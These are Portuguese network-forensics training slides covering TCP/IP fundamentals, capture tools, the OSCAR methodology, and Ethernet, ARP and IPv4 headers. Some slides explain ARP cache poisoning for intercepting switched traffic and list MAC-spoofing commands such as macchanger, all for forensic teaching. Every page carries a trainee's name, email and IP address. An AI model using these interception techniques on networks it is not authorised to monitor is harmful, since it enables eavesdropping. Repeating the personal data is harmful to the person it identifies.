Forense em Redes de Computadores (3)

Prévia do material em texto

Treinamento de Forense em Redes de Computadores
Prof. Marcus Fábio Fontenelle, M.Sc.
www.academiadeforensedigital.com.br
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a 
reprodução desta obra, mesmo parcial, por qualquer processo, sem prévia autorização, por 
escrito, do autor. 
Autor: Marcus Fábio Fontenelle do Carmo
Direitos de Divulgação: AFD - Academia de Forense Digital
Contato: renan.cavalheiro@academiadeforensedigital.com.br
2
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Instrutor – Marcus Fábio Fontenelle
• Perito Criminal na Polícia Científica do Paraná – Seção de Computação Forense
• Membro do Comitê de Segurança Institucional da Polícia Científica do Paraná
• Instrutor das Academias das Polícias Civil e Militar do Paraná – Disciplinas: "Computação Forense" e "Vestígios Cibernéticos e Cadeia de Custódia"
• Atuou como perito judicial e assistente técnico
• Instrutor de treinamentos na área de segurança da informação – Bradesco(SP), ITAÚ(SP), DETRAN(RO), TRE(CE/PR), Receita Federal(CE) etc
• Professor universitário desde 2005 – Graduação / Pós-graduação
• Palestrante – AFD Summit, ISC2 Security Congress Latin America, SC Experience, ROADSEC, SBRC etc
• Membro ABCF (Academia Brasileira de Ciências Forenses)
• Membro SBCF (Sociedade Brasileira de Ciências Forenses)
• Membro HTCIA (High Technology Crime Investigation Association)
• Membro da ISSA-Brasil (Information Systems Security Association)
 25 anos de atuação na área de TI
 Mestre em Informática Aplicada
 Especialista em Sistemas de Telecomunicações
 Especialista em Computação Forense e Perícia Digital
 Especialista em Direito Digital
 Cursos de extensão em Cibersegurança no MIT/EUA
 Infosec Competence Leader (2018/2019) – https://tinyurl.com/infosec-leader
❖ Defensive Security e Incident Handling and Analysis
| marcus.fabio@gmail.com | www.linkedin.com/in/marcusfabio | www.instagram.com/marcusfabiof |
3
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://tinyurl.com/infosec-leader
Agora é a sua vez!!!
• Nome
• Onde Trabalha
• Atividade que exerce
Fonte: Pixabay
4
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
• Mantenha o microfone no mudo
• Aula de 19:00 às 23:00
• 15 minutos de intervalo
Fonte: Pixabay
5
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Conteúdo Programático
• Fundamentos de Redes de Computadores
• Fundamentos da Análise de Redes
• Metodologia de Análise Forense em Redes de Computadores
• Análise dos Principais Protocolos da Pilha TCP/IP
• Análise de Logs
6
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Sugestão Bibliográfica
7
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Fundamentos de 
Redes de 
Computadores
8
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Modelo OSI
• Open Systems Interconnection (Interconexão de Sistemas Abertos)
• Desenvolvido pela ISO (International Standards Organization)
• Contém sete camadas:
➢Aplicação
➢Apresentação
➢Sessão
➢Transporte
➢Rede
➢Enlace de dados
➢Física
Fonte: https://tinyurl.com/y7dsgsflFonte: https://tinyurl.com/yxm9lecb
9
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Arquitetura TCP/IP (RFC 1122)
10
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
O Conceito de Camadas 
• O conceito de camadas é usado para ajudar na descrição
dos detalhes do processo de fluxo de dados entre sistemas
finais (hosts).
➢ Técnica Modular
➢ Divida tarefas complexas em subtarefas
• Cada módulo trata de um subconjunto específico de tarefas
• Vantagens da Modularidade
➢ Desenvolvimento de aplicação mais fácil
➢ A rede pode mudar sem que todos os “programas”
sejam modificados Fonte: Pixabay
11
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
O Conceito de Camadas 
• A comunicação ocorre:
➢ Entre diferentes módulos no mesmo sistema
➢ Entre módulos semelhantes em sistemas diferentes
12
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Protocol Data Unit (PDU) e Encapsulamento
• Cada camada funcional possui o seu PDU
que, genericamente, é chamado de pacote.
• A partir da camada de transporte cada
PDU recebe um nome específico,
identificando-o conforme as funções que
devem ser executadas em cada camada.
Matreshka – Boneca Russa
Cabeçalho PDU 3
Cabeçalho PDU 2
Cabeçalho PDU 1
Dado
13
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Subrede de Interconexão
14
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Fundamentos da 
Análise de Redes
15
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
O que é Análise de Redes?
• Análise de redes é o processo de monitorar e analisar o tráfego
de rede, fornecendo maneiras de:
➢ Identificar problemas
➢ Verificar desempenho
➢ Localizar brechas de segurança
➢ Entender o comportamento de aplicativos e serviços
➢ Realizar planejamento de capacidade
Fonte: Pixabay
16
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Analisador de Protocolo
• Software ou hardware utilizado para monitorar e analisar o tráfego
de rede. Também conhecido como sniffer ou analisador de pacotes.
• Exemplos de Sniffers:
➢ Capsa Network Analyzer
➢ Cain and Abel
➢ Ettercap / Bettercap
➢ Microsoft Network Monitor
➢ NetworkMiner
➢ Tcpdump
➢ Windump
➢ Wireshark (originalmente conhecido como Ethereal)
Fonte: Pixabay
17
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Apresentando o Wireshark
18
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Apresentando o Wireshark
19
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Apresentando o TCPDUMP
20
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Tipos de Tráfego
21
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Modos de Transmissão
22
Simplex
OU
Half-Duplex
Full-Duplex
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Funcionamento de um Switch
Fonte: Wireshark Network Analysis, Laura Chappell, Fig. 4, Pág: 12
23
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Funcionamento de um Roteador
Fonte: Wireshark Network Analysis, Laura Chappell, Fig. 5, Pág: 13
24
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Funcionamento de um Firewall
Fonte: Wireshark Network Analysis, Laura Chappell, Fig. 6, Pág: 14
25
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Tráfego Visível Através de um Switch
• Broadcast
• Multicast
• Tráfego tendo como origem e/ou destino o endereço MAC do switch
• Tráfego para um endereço MAC desconhecido
Fonte: Pixabay
26
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Monitorando Tráfego em uma Rede Comutada
• Hub entre um tráfego full-duplex (Hubbing-Out)
• Espelhamento de uma porta de um switch (SPAN – Switched Port Analysis)
• Grampo (TAP – Test Access Port) entre o tráfego half ou full-duplex
➢ TAP Não Agregado
➢ TAP Agregado
• Envenenamento do Cache ARP (Address Resolution Protocol)
• Instalação do analisador de protocolos no sistema alvo
27
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Hub entre um Tráfego Full-Duplex (Hubbing-Out)
Vantagens Desvantagens
Não precisa alterar a configuração da rede Perda de performance devido ao hub
Não necessitade configuração de software Dificuldade de instalar em grandes redes
Baixo custo Precisa de hardware adicional
INTERNET
Hub
Firewall
Switch Não Gerenciável
Sniffer
28
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
SPAN (Switched Port Analysis)
Vantagens Desvantagens
Não precisa alterar a configuração da rede Caro
Pequena perda de performance Necessita configuração no switch
• Também conhecido como switch monitoring, port monitoring ou espelhamento de porta.
• Não encaminha pacotes que contenham erros na camada física.
INTERNET
Firewall
Switch Gerenciável
Sniffer
29
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Grampo (TAP – Test Access Port)
• São equipamentos passivos colocados no caminho (in-line) entre dispositivos.
➢ Podem encaminhar pacotes que contenham erros na camada física.
➢ Não introduzem retardo ou alteram o conteúdo do tráfego fluindo através dele.
• TAP Não Agregado: Repassa a comunicação full-duplex para duas portas distintas.
• TAP Agregado : Combina o tráfego bidirecional em uma única porta de saída.
Fonte: Adaptado de Chris Sanders, Análise
de Pacotes na Prática , Fig. 2-8, Pág: 25
Fonte: Adaptado de Chris Sanders, Análise
de Pacotes na Prática , Fig. 2-9, Pág: 26
30
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Grampo (TAP – Test Access Port)
TAP Não Agregado
TAP Agregado
Fonte: Fotos disponíveis nos sites dos fabricantes
31
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Envenenamento de Cache ARP (Cache ARP Poisoning)
• O envenenamento de cache ARP (ARP Cache Poisoning), também chamado de ARP Spoofing, é uma
forma sofisticada de escutar a transmissão em uma rede com switches.
• Seu funcionamento se dá através do envio de mensagens ARP para um switch ou para um roteador com
endereços MAC falsos a fim de interceptar o tráfego para outro dispositivo.
Fonte: Adaptado de Chris Sanders, Análise de Pacotes na Prática , Fig. 2-10, Pág: 28
32
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Monitorando Tráfego WAN
Cliente 1
Rede 10.1.0.0/16 Rede 10.2.0.0/16
Servidor 1
TAP
Switch 1
Roteador 1
Cliente 3Cliente 2
Switch 2
Roteador 2
Servidor 2
Analisador de
Protocolos 1
Analisador de
Protocolos 2
33
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Diagrama de Posicionamento do Analisador de Protocolos
Fonte: Adaptado de Chris Sanders, Análise
de Pacotes na Prática , Fig. 2-15, Pág: 35
34
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia de 
Análise Forense 
em Redes de 
Computadores
35
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Evidência Digital
• Art. 158 A, § 3º, CPP: Vestígio é todo objeto ou material
bruto, visível ou latente, constatado ou recolhido, que se
relaciona à infração penal.
• Evidência: É o vestígio, que após as devidas análises, tem
constatado, técnica e cientificamente, a sua relação com o
fato investigado.
• Evidência digital é informação ou dado, armazenado ou
transmitido eletronicamente, em modo binário, que pode
ser reconhecida como parte de um evento. (Glossário de
Segurança da Informação – Portaria nº 93, 26/09/2019)
• Resumindo: Evidência digital é qualquer informação
com valor probatório armazenada em formato digital.
• Evidência digital baseada em rede é a evidência digital
que foi produzida como resultado de uma comunicação
através de uma infraestrutura de telecomunicações ou rede
de computadores.
Fonte: Pixabay
36
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Categorias de Evidências
• Evidência Real: Qualquer objeto físico, tangível, que desempenhou um papel relevante em um evento que
está sendo investigado.
➢ Ex: pegada, disco rígido, unidade USB, computador e seus componentes etc.
• Melhor Evidência: A melhor evidência que pode ser produzida em tribunal. Se a evidência original não
estiver disponível, evidências alternativas de seu conteúdo podem ser admitidas de acordo com a “regra da
melhor evidência".
➢ Ex: foto de uma cena de crime, um arquivo recuperado de um HD etc.
• Evidência Direta: Um testemunho direto oferecido por uma testemunha direta do ato ou atos em questão.
➢ Ex: “Eu o vi colocar o pendrive no servidor.”; “Ela me mostrou um vídeo de pedofilia.”
• Evidência Circunstancial: Evidência que não suporta diretamente uma conclusão específica. Pode ser
ligada a outras evidências para a dedução de uma conclusão.
➢ Ex: número serial de um dispositivo USB, endereço MAC etc.
37
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Tipos de Evidência Digital
• Voláteis: Os dados são perdidos logo que o dispositivo é desligado
➢ Hora do sistema
➢ Usuários logados
➢ Arquivos abertos
➢ Conexões de rede
➢ Processos em execução
➢ Histórico de Comandos
• Não voláteis: Os dados persistem em armazenamento secundário
(ex: disco rígido, pendrive etc) após o desligamento do dispositivo.
➢ Arquivos ocultos
➢ Arquivos apagados
➢ Clusters não alocados
➢ Partições Não utilizadas
➢ Partições Ocultas
➢ Logs
➢ Informações do registro
Fonte: Pixabay
38
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Análise Forense Computacional (Tradicional x Rede)
• A análise forense computacional “tradicional” corresponde a atividades periciais em computadores
tendo por objetivo a análise de mídias de armazenamento em processos de recuperação e extração de
arquivos, classificação e busca de evidências após a coleta e identificação realizados de forma adequada.
• A análise forense em redes de computadores (network forensics) consiste na captura, no
armazenamento, na manipulação e na análise de dados que trafegam (ou trafegaram) em redes de
computadores, como parte de um processo investigativo.
➢ Não é um produto;
➢ Não substitui soluções e processos de segurança;
➢ Não envolve somente a captura de tráfego.
39
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Análise Forense Computacional (Tradicional x Rede)
• Dados dinâmicos
• Identificar a exata localização das evidências
digitais pode ser problemático
• O acesso físico aos dispositivos de rede
pode ser difícil
• A obtenção de dados pode gerar interrupções
ao negócio
• A maioria dos dispositivos de rede não
possuem dados armazenados de forma
persistente
• Pouca jurisprudência e padronização
• Dados estáticos
• A evidência digital está contida dentro do
sistema de arquivos
• Fácil de fazer uma imagem forense
• A obtenção de dados gera pouca ou
nehuma interrupção ao negócio
• Já há muita jurisprudência e devido a isso
há uma maior facilidade da admissão da
prova em juízo
RedeTradicional
40
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Desafios nas Perícias em Redes de Computadores
• Aquisição (origem dos dados)
• Granularidade dos dados (conteúdo)
• Armazenamento
• Integridade
• Privacidade
• Admissibilidade
• Processo de Análise dos Dados
Fonte: Pixabay
41
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Técnicas de Análise Pericial em Redes de Computadores
• Conteúdo total dos dados
➢ Cabeçalho + área de dados (todas as camadas da pilha TCP/IP)
• Conteúdo parcial dos dados
➢ BPF – Berkeley Packet Filter
• Caches e Logs
➢ Tabelas ARP
➢ Sistemas operacionais
➢ Servidores de aplicação (HTTP, FTP, SMTP etc)
➢ Servidores de Serviços (DNS, DHCP, Proxy etc)
➢ Firewall
➢ Concentrador VPN
➢ IDS/IPS (Intrusion Detection/Prevention System)
➢ SIEM (Security Information and Event Management)
Fonte: Pixabay
42
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia Forense Tradicional
43
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179Metodologia OSCAR
Fonte: “NIST - Guide to Integrating 
Forensic Techniques into Incident 
Response”, Figura 3-1
• Obtain Information (Obter informação )
• Strategize (EStratégia)
• Collect evidences (Coletar evidências)
• Analyze (Analisar)
• Report (Relatar)
44
Fonte: Network Forensics, Sherri Davidoff e Jonathan Ham, Pág. 17
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia OSCAR – Obter Informação
• Descrição do que aconteceu
• Data, hora e método de descoberta do incidente
• Pessoas envolvidas
• Sistemas e dados envolvidos
• Ações tomadas desde a descoberta do incidente
• Questões legais
• Topologia da rede
• Modelo de negócio
• Fontes disponíveis de evidência
• Recursos disponíveis para auxílio na investigação
• Prazo para a investigação
• Objetivos da investigação
45
Sabe onde consigo 
informações sobre 
o incidente?
Lá no Posto 
Ipiranga!
QUEM NÃO SABE O QUE PROCURA 
NÃO ENTENDE O QUE ENCONTRA!
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia OSCAR – Estratégia
• Identificar as fontes de evidência e seus respectivos responsáveis
46
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia OSCAR – Estratégia
• Estimar o valor, o custo e o esforço de coleta para cada fonte de evidência
• Priorizar a aquisição de evidências
• Decidir qual método de coleta será utilizado
• Planejamento inicial de coleta e análise
Fonte da Evidência Valor Esforço Volatilidade Prioridade
Logs de Firewall Alto Médio Baixa 2
Cache do Proxy Web
Alto Baixo Médio 1
Tabelas ARP Baixo Baixo Alto 3
47
Fonte: RFC 3227 - “Guidelines for Evidence Collection and Archiving”
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia OSCAR – Coletar Evidências
• Captura das evidências
• Armazenamento e transporte das evidências
• Melhores práticas:
➢ Colete assim que possível
➢ Faça cópias criptografadas (se possível)
➢ Analise sempre as cópias (de preferência a cópia da cópia)
➢ Utilize ferramentas confiáveis e que tenha reputação (https://toolcatalog.nist.gov)
➢ Documente tudo o que fizer
➢ Tenha sempre em mente a cadeia de custódia
48
QUANTO MAIS RÁPIDO OCORRER A COLETA, 
MELHOR A QUALIDADE DAS EVIDÊNCIAS.
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://toolcatalog.nist.gov/
Metodologia OSCAR – Analisar
• Correlação
• Timeline
• Eventos de interesse
• Corroboração
• Recuperação de evidências adicionais
• Interpretação
Fonte: Pixabay
49
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Metodologia OSCAR – Relatar
• O relatório produzido deverá ser:
➢Compreensível por pessoas não técnicas, tais como:
✓ Equipe jurídica
✓ Gerentes
✓ Pessoal da área de RH
✓ Juízes
✓ Promotores
✓ Jurados
➢ Defensável em detalhes
➢ Factual
Fonte: Pixabay
50
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Análise de 
Protocolos 
TCP/IP
51
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Ethernet
52
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Ethernet – Conceitos Básicos
• Ethernet é um protocolo de acesso ao meio que utiliza contenção permitindo que todos os hosts
em uma rede compartilhem a mesma largura de banda de um link.
• Ethernet é popular porque é fácil de implementar, resolver problemas e adicionar novas
tecnologias, como Fast Ethernet, Gigabit Ethernet e o 10 Gigabit Ethernet, a uma infraestrutura
existente.
• Ethernet usa as especificações da camada de enlace e da camada física.
Fonte: http://scihi.org/robert-metcalfe-ethernet
53
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
http://scihi.org/robert-metcalfe-ethernet/
Método de Acesso ao Meio
Carrier Sense Multiple Access with Collision Detect (CSMA/CD)
54
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Quadros Ethernet
• O Ethernet na camada de enlace é responsável pelo endereçamento Ethernet, o qual é tipicamente
chamado endereçamento de hardware ou endereçamento MAC (Media Access Control).
• O Ethernet é também responsável por enquadrar os pacotes recebidos da camada de rede e prepará-
los para transmissão na rede local.
• O endereço MAC vem configurado de fábrica em todas as interfaces de rede e é um endereço de
48 bits (6 bytes) escritos em hexadecimal.
• Mesmo que diferentes tecnologias de LAN estejam sendo usadas o formato do endereço MAC é o
mesmo.
https://www.wireshark.org/tools/oui-lookup.html
https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries
55
G/L I/G
Organizationally
Unique Identifier (OUI)
Assinalado pelo IEEE
Associado pelo
Fabricante
47 46
24 bits 24 bits
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
https://www.wireshark.org/tools/oui-lookup.html
https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries
Quadro Ethernet
• Ethernet II (RFC 894) – Atual Padrão
• IEEE 802.3 (RFC 1042)
56
Preâmbulo: Não faz parte do cabeçalho. É uma sequência alternada de 1s e 0s (64 bits ao todo) que permite ao
dispositivo receptor sincronizar o fluxo de bits. No quadro Ethernet II é formado por 7 bytes “10101010”
(0xAA) e o último byte, chamado SFD (Start of Frame Delimeter), é “10101011” (0xAB).
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho Ethernet
57
• Endereço MAC de Destino: Indica o endereço MAC do host de destino. Podendo também ser
um endereço de multicast ou broadcast. Possui 48 bits (6 bytes).
• Endereço MAC de Origem: Indica o endereço MAC do host de origem. Neste campo não é
válido o valor de um endereço de multicast ou broadcast. Possui 48 bits (6 bytes).
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho Ethernet
• Dados: Possui os dados a serem transmitidos. Seu tamanho pode variar de 46 a 1500 bytes.
• Frame Check Sequence (FCS)/ Cyclic Redundancy Check (CRC): É um campo utilizado para
fazer a verificação de erros do quadro ethernet. Vem ao final do Quadro e não é visível numa
captura de pacote.
58
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho Ethernet
Tipo: O quadro Ethernet II utiliza o campo TIPO
com a finalidade de identificar o protocolo da camada
de rede associado ao quadro.
Decimal Hexadecimal
2048 0x800 IP (Internet Protocol)
2054 0x806 ARP (Address Resolution Protocol)
2056 0x808 Frame Relay ARP
33024 0x8100 IEEE 802.1Q VLAN-tagged frames
34525 0x86DD IPv6
34887 0x8847 MPLS (Multiprotocol Label Switching)
Valor do Campo TIPO
Descrição
Fonte:
http://www.iana.org/assignments/ieee-802-
numbers/ieee-802-numbers.xhtml
59
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
http://www.iana.org/assignments/ieee-802-numbers/ieee-802-numbers.xhtml
Localização do Endereço MAC no Linux
• No Linux o endereço MAC estará localizado em /sys/class/net/<interface>/address.
➢ ifconfig <interface> hw ether <endereço MAC> : altera o endereço MAC da interface.
➢ macchanger -m <endereço MAC> <interface> : altera o endereço MAC da interface.
➢ macchanger -s <interface> : lista o endereço MAC configurado e o permanente da interface.
➢ ethtool -P <interface> : lista o endereço real (permanente) da interface.
➢ macchanger -p <interface> : retorna ao endereço real (permanente) da interface.
60
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Localização do Endereço MAC
• No Windows ao se alterar o endereço MAC é ser criada a entrada NetworkAddress no seguinte caminho
do registro:
➢ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-
BFC1-08002BE10318\XXXX, onde XXXX é a entrada correspondente a interface de rededo
sistema.
➢ wmic NIC get Name, MacAddress, DeviceID: lista o ID das interfaces de rede do sistema.
➢ getmac /v /fo list (table): lista o endereço MAC das interfaces de rede do sistema.
➢ wmic NIC where "AdapterTypeID='0' AND PhysicalAdapter='true' AND NetEnabled='true' AND
PNPDeviceID LIKE '%PCI%'" get Name, MacAddress : Lista as interfaces físicas ativas
• De forma remota o MAC pode ser obtido da seguinte forma:
➢ nbtscan -r <endereço IP da rede/máscara da rede> (apenas Linux)
➢ arp -a
➢ nbtstat -a <endereço IP> (apenas Windows)
61
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
ARP
Address Resolution
Protocol
62
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Funcionamento do ARP
O protocolo ARP (Address Resolution
Protocol), descrito na RFC 826,
permite a um host encontrar o endereço
físico de um outro host em uma mesma
rede física apenas tendo conhecimento
do endereço IP do host de destino.
63
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Consultando a Tabela Cache do ARP
Pacotes multicast IPv4 são entregues usando o intervalo de
endereços MAC 01:00:5e:00:00:00 até 01:00:5e:7f:ff:ff
com uma OUI de propriedade da IANA (RFC 1112).
64
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho ARP (RFC 826)
Número Descrição
1 Ethernet
15 Frame Relay
16 ATM (Asynchronous Transmission Mode)
17 HDLC (High-Level Data Link Control)
Fonte: http://www.iana.org/assignments/arp-parameters/arp-parameters.xhtml
65
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
http://www.iana.org/assignments/arp-parameters/arp-parameters.xhtml
Proxy ARP (RFC 1027)
• Permite que um host responda a broadcasts ARP no lugar de outro host.
66
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Envenenamento de Cache ARP
• Utilizado por atacantes para interceptação de dados ou causar ataques de negação de serviço
(DoS – Denial of Service).
• Pode ser uma forma legítima (desde que devidamente autorizada) de capturar os pacotes de
um dispositivo alvo em uma infraestrutura de rede.
• Não deve ser utilizada quando o computador alvo apresentar um alto nível de utilização na rede.
67
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
IPv4
Internet Protocol
Versão 4
68
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Serviços da Camada de Rede
• Não Confiável
• Não Orientado a Conexão
• Best-Effort (Melhor Esforço)
69
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Objetivos do Protocolo IP
• Definir a unidade básica de transmissão usada através de uma rede TCP/IP
• Encaminhar os pacotes
• Definir regras que corroborem a ideia de entrega de pacotes não confiável:
➢ Regras que caracterizem como os hosts e os roteadores devem processar os pacotes
➢ Como e quando mensagens de erro devem ser geradas
➢ Em quais circunstâncias um pacote deverá ser descartado
70
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
71
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo VERSÃO, de quatro bits, de um datagrama contém a versão do protocolo IP utilizada
para criar o datagrama.
• O campo TAMANHO CABEÇALHO, também de quatro bits, fornece o comprimento do
cabeçalho do datagrama medido em palavras de 32 bits.
➢ Essa contagem não inclui o campo de dados.
72
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo TAMANHO DO DATAGRAMA fornece o tamanho do datagrama IP medido em
octetos ou bytes, incluindo octetos do cabeçalho e dos dados.
➢ O maior tamanho possível para um datagrama IP é “216 – 1” ou 65.535 octetos (64 KB).
➢ Todos os hosts devem estar preparados para aceitar datagramas de até 576 octetos (sejam eles
inteiros ou em fragmentos).
73
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 791)
• O campo TIPO DE SERVIÇO (Type of Service ou ToS), de oito bits, especifica como o
datagrama deve ser tratado, ou seja, indica a qualidade do serviço requisitado pelo datagrama IP.
000 Normal
001 Prioridade
010 Imediato
011 Flash
100 Flash Override
101 Crítico
110
Controle de Interligação de 
Redes
111 Controle de Rede
PRECEDÊNCIA D RT
NÃO 
USADO
0 3 4 765
000 Serviço Normal
001 Maximiza a Confiabilidade
010 Maximiza o Throughput
100 Minimiza o Intervalo
74
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP (RFC 2474)
• Os serviços diferenciados fazem uso dos 6 bits mais significativos do campo ToS, chamado de
campo DSCP (Differentiated Service Codepoint).
• Os últimos bits (CU – Currently Unused) do campo DiffServ atualmente não estão definidos dentro
da arquitetura de Serviços Diferenciados.
• Estes bits têm sido utilizados como bits de notificação de congestionamento explícito (ECN -
Explicit Congestion Notification)
• A qualidade de serviço na arquitetura DiffServ é garantida através de mecanismos de priorização de
pacotes na rede, diferentemente da arquitetura IntServ (Serviços Integrados), onde a qualidade de
serviço é garantida através de reserva de recursos na rede (tipicamente obtida através do protocolo
RSVP – Resource Reservation Protocol).
0 1 2 3 4 5 6 7
DSCP CU
75
MARIA DE FATIMA CHAVES - maria.chaves@policiacivil.pa.gov.br - IP: 170.245.95.179
Cabeçalho IP
• No campo DSCP, são codificadas as classes para os serviços diferenciados.
• Classe AF (Assured Forwarding) – RFC 2597: Esta classe é composta de várias subclasses de
serviço que possuem diferentes níveis de precedência em relação ao descarte de pacotes. É indicado
para as aplicações que não são tão sensíveis ao atraso e requerem garantia de banda. O DSCP é
codificado no formato aaadd0, onde aaa define a classe de serviço e dd define a precedência.
Precedência de 
Descarte/Classe
AF1 AF2 AF3 AF4
1 - Baixa 001010 010010 011010 100010
